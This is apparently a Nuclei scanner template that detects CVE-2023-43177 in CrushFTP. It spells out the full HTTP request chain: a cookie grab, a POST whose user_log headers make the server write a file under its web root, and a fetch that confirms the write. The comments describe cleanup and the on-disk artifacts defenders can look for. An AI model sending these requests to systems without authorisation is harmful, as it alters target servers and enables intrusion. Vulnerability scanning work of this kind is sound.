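# Nuclei template for CVE-2023-43177 (CrushFTP < 10.5.1). Tagged `intrusive`:
# request 2 asks the server to write a user log under ./WebInterface/, so a run
# leaves a directory and a file on the target that must be cleaned up.
id: CVE-2023-43177

info:
  name: CrushFTP < 10.5.1 - Unauthenticated Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-43177
    - https://convergetp.com/2023/11/16/crushftp-zero-day-cve-2023-43177-discovered/
    - https://blog.projectdiscovery.io/crushftp-rce/
    - https://github.com/the-emmons/CVE-Disclosures/blob/main/Pending/CrushFTP-2023-1.md
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-43177
    cwe-id: CWE-913
    epss-score: 0.96402
    epss-percentile: 0.99567
    cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3  # keep equal to the number of entries under `http`
    vendor: crushftp
    product: crushftp
    shodan-query: http.html:"crushftp"
    fofa-query: body="crushftp"
  tags: cve,cve2023,crushftp,unauth,rce,intrusive

# All three requests must match, in order: request 2 reuses the cookies
# captured by request 1, and request 3 verifies the file request 2 caused
# the server to write.
flow: http(1) && http(2) && http(3)

# Random names so the directory and file created on the target do not
# collide with existing content. Both variables are referenced in request 2
# (headers) and request 3 (path).
variables:
  dirname: "{{randbase(5)}}"
  filename: "{{randbase(5)}}"

http:
  # 1. Load the web interface solely to obtain the CrushAuth / currentAuth
  #    cookies. The matcher is `internal`, so this step is never reported on
  #    its own; it only gates the rest of the flow.
  - method: GET
    path:
      - "{{BaseURL}}/WebInterface"

    matchers:
      - type: dsl
        internal: true
        dsl:
          - contains_all(to_lower(header), "currentauth", "crushauth")

  # 2. The `user_*` request headers name a log path under the web root.
  #    Presumably the vulnerable build copies request headers into session
  #    attributes (CWE-913) — confirm against the references; `as2-to`
  #    looks like a required trigger header, not a value that matters.
  - method: POST
    path:
      - "{{BaseURL}}/WebInterface/function/?command=getUsername&c2f={{http_1_currentauth}}"
    headers:
      Cookie: "CrushAuth={{http_1_crushauth}}; currentAuth={{http_1_currentauth}}"
      as2-to: X
      user_name: "crushadmin{{dirname}}"
      user_log_path: "./WebInterface/{{dirname}}/"
      user_log_file: "{{filename}}"
      Content-Type: application/x-www-form-urlencoded
    body: |
      post=body

    matchers:
      - type: regex
        regex:
          - "crushadmin"

  # 3. Confirm the log file is now served from under /WebInterface/ and
  #    carries the injected user name. For defenders: unexpected
  #    subdirectories and files appearing under the WebInterface directory
  #    are the on-disk artifact of this technique.
  - method: GET
    path:
      - "{{BaseURL}}/WebInterface/{{dirname}}/{{filename}}"

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, "crushadmin{{dirname}}")
        condition: and

# NOTE(review): the digest below was computed over the original template
# text; it will no longer verify after this file is edited and has to be
# regenerated by the template signing tool.
# digest: 4a0a00473045022100e013ea63ca1f07dde63ec297ffbbd1f37e560231c1396d3dd07debcc39e7a17502202b87f70d993704c3d894534a22f376c9b0e545474adef184c0f7ca697a37708b:922c64590222798bb761d5b6d8e72950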